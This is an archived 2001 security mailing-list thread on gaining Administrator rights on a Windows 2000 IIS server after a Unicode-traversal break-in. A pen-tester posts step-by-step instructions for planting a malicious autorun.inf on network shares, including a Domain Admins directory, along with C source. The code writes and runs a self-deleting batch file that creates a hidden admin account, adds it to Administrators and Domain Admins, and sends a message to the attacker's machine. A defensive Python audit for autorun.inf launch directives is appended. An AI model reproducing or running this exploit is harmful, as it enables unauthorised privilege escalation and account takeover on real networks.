Paul Cardon wrote:
> Charlie Rhodes wrote:
>
>>> We have a win2k where we have access to a cmd.exe with the rights of the
>>> web-server and we would like to obtain administrator rights. Also we
>>> don't have the rights to read the SAM files.
>>> We tried the well-known methods under win NT 4.0 (like breaknt.exe,
>>> read from raw device) in vain.
>>
>> Do you have network (ftp) access? or floppy access?
>> http://www.bo2k.com should do the trick. You'll probably want to configure
>> the server part off the machine, then load it on.
>
>
> This is the second time this question has been asked on the list and
> almost everybody misunderstands the problem. Let me restate it:
>
> Suppose a pen-tester has used the IIS Unicode vulnerability to download
> a back door such as a netcat listener to the target Win2K server and now
> has a remote cmd shell. At this point the remote shell is running with
> IUSR_<MACHINE> privilege since that is the privilege level that the
> Unicode vulnerability provides.
>
> Now, how does the pen-tester elevate privilege to Administrator?
>
> Any software that is downloaded (tftp, ftp, whatever) through the remote
> command shell will only run with IUSR_<MACHINE> privilege. Why do
> people think that downloading BO2K, netcat, or some such will magically
> elevate privilege? It doesn't.
>
> The only things that are possible are:
>
> 1) There is a known privilege escalation vulnerability that can be
> exploited with local unprivileged access. The attacker can download and
> run that code to gain Administrator access.
You can use another Win2k || NT machine to execute programs, like:
1 - Copy a "hacked version" of autorun.inf + hacked program to another
Win2K || NT machine;
2 - Put the root directory that hosts autorun.inf in shared mode;
3 - On the IIS Unicode Traversal machine, mount the shared directory;
4 - Now you'll see the "hacked autorun.inf" executing arbitrary commands.
I think this will help you...
Another way to do this is:
1 - Find the PDC (if it exists) in the domain;
2 - Find the "mountable directory" for "Domain Admins";
3 - Put the "hacked autorun.inf" in this directory;
4 - Sit and relax while waiting for a member of "Domain Admins" to log on.
You could do this with a "Shell Folder" vulnerability, and others...
>
> 2) Brute force attack against accounts with local Administrator
> privilege.
You can crack the SAM file, because the IUSR_<MACH> has permission to read
this file.
>
> 3) Look for vulnerabilities in other systems that the web server can
> talk to. Some of those may expose Domain accounts with Administrator
> privilege on the web server or other systems that are trusted by the web
> server.
>
> There are others but Win2K does limit some of the nicer possibilities
> that existed with NT.
>
> -paul
A source example of the "hacked autorun.inf" and program looks like:
--- autorun.cpp
/****************************************************************************************
* Author   : Nelson Brito
* E-mail   : nelson_at_secunet.com.br && stderr_at_sekure.org
* URL      : http://stderr.sekure.org && http://www.secunet.de
* Date     : Belem, 9 December 2000.
* Published: Rio de Janeiro, 9 January 2001.
****************************************************************************************/
/****************************************************************************************
* To exploit this vulnerability you will have to use your brain, because I am not
* going to teach you how to use it; I am only releasing the code.
*
* Thanks to: Bruno Alvim(remorse), Andrea Goulart, Helge Fischer, Thiago(c0nd0r),
*            Felipe(falcon), corb_at_sekure(what's up?), Nilson Brito(brother),
*            Andre Silveira(phD), Charlene(mi amore) and Mom... =)
****************************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <process.h> /* execl() in VC++. */

FILE *fp;

int main(void){
    char *windir = (char *)getenv("WINDIR"); // Where is %SystemRoot%?
    char *batch = "C:\\TEMP\\nelson.bat";     // Temporary batch file.
    if(!windir){ fputs("WINDIR is not set\n", stderr); exit(1); } // getenv() may return NULL.
    /**********************************************************************************
    * Yes, I know, I could have used "NetUserAdd()" and "NetGroupAdd()", but I
    * preferred a temporary "batch" file; the code stays smaller.
    **********************************************************************************/
    if(!(fp = fopen(batch, "w"))){ perror("fopen"); exit(0); }
    fprintf(fp, "@echo off\n");
    fprintf(fp, "@%s\\system32\\net.exe user nelson secunet /fullname:\"Nelson Brito from Security Networks AG / IBQN\" /comment:\"Penetration Test Account\" /add > nul\n", windir);
    /**********************************************************************************
    * Here you must decide whether this runs on a DC or on a stand-alone machine.
    **********************************************************************************/
#ifdef _IS_A_PDC_
    fprintf(fp, "@%s\\system32\\net.exe group Administrators nelson /add > nul\n", windir);
    fprintf(fp, "@%s\\system32\\net.exe group \"Domain Admins\" nelson /add > nul\n", windir);
#else
    fprintf(fp, "@%s\\system32\\net.exe localgroup Administrators nelson /add > nul\n", windir);
#endif
    /**********************************************************************************
    * At the end, a message is sent to the machine PITBULL, my machine. =)
    **********************************************************************************/
    fprintf(fp, "@%s\\system32\\net.exe send PITBULL \"Autorun Privilege Escalation Exploit Executed\"\n", windir);
    fprintf(fp, "@%s\\system32\\cmd.exe /c del %s\n", windir, batch);
    fclose(fp);
    execl(batch, batch, NULL); // Run the temporary batch file.
    perror("execl");           // Execution error.
    return(0);
}
--- autorun.cpp
--- autorun.inf
[autorun]
open=autorun.exe
--- autorun.inf
PS: It works with PGPDisk at mount time. When you mount the
PGPDisk, the SYSTEM recognizes it as a mount point, then it executes the
"hacked autorun.inf".
Nothing further,
--
Nelson Brito
Security Analyst && Penetration Tester
Security Networks AG / IBQN - http://www.secunet.de/
Received on Jan 10 2001
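A defender-side audit for the autorun.inf shape discussed in this thread, added here as an example and not part of the original mail or its code: it walks a constructed set of share and volume paths, parses each autorun.inf, and flags any that carries a launch directive (open= as in the thread, or the shellexecute key), which is what a review of writable shares and mountable volumes should report. The paths and file contents are constructed samples, not real hosts.

```python
import configparser
import ntpath

# Constructed sample of what a share/volume audit might encounter (not real hosts):
# the thread's two-line autorun.inf next to a harmless vendor one and an unrelated file.
SAMPLE_FILES = {
    r"\\fileserver\public\autorun.inf": "[autorun]\nopen=autorun.exe\n",
    r"\\fileserver\public\docs\readme.txt": "no directives here",
    r"D:\autorun.inf": "[autorun]\nicon=setup.ico\nlabel=Vendor CD\n",
}

# autorun.inf keys that make Explorer launch something when the volume is mounted.
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text):
    """Return the [autorun] section as {key_lowercase: value}, or {} if absent or garbled."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    for section in cp.sections():
        if section.lower() == "autorun":  # section header matched case-insensitively
            return {k.lower(): v.strip() for k, v in cp.items(section)}
    return {}


def audit_autorun(files):
    """Flag every autorun.inf in `files` ({path: content}) that carries a launch directive."""
    findings = []
    for path, content in files.items():
        if ntpath.basename(path).lower() != "autorun.inf":
            continue
        directives = parse_autorun(content)
        launchers = {k: directives[k] for k in LAUNCH_KEYS if k in directives}
        if launchers:
            findings.append({"path": path, "launch": launchers})
    return findings


if __name__ == "__main__":
    for f in audit_autorun(SAMPLE_FILES):
        print(f"{f['path']}: launches {f['launch']}")
```

On the host side, the matching mitigation is the NoDriveTypeAutoRun policy value, which disables autorun processing per drive type.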